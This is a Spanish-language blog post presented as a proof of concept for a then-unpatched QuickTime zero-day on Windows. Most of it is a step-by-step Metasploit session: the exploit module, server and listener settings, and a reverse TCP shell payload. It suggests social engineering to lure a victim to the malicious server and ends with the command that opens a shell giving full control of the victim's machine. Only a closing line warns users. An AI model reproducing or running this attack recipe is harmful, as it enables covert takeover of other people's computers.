Como ya indicamos en entradas anteriores, Ruben Santamarta investigador de seguridad, ha sacado a la luz un 0day que afecta a las últimas versiones de QuickTime en todas las versiones de Windows.

La noticia ha cogido tanta expectación, que los desarrolladores de metasploit han tardado apenas un día en liberar un módulo para su framework.

En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).

Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:

·         use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
·         set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
·         set SRVPORT 80 (Puerto local del servicio)
·         set URIPATH juegos (Uri del servicio)
·         set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
·         set LHOST 192.168.0.162 (IP donde se conectará la víctima)
·         set LPORT 5050 (Puerto local de escucha)
·         exploit (Ejecutamos el exploit)

Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.

Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.

Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.

Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

·         sessions -i 2

De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.

Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.

Por admin

Deja una respuesta

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.

Powered By
Best Wordpress Adblock Detecting Plugin | CHP Adblock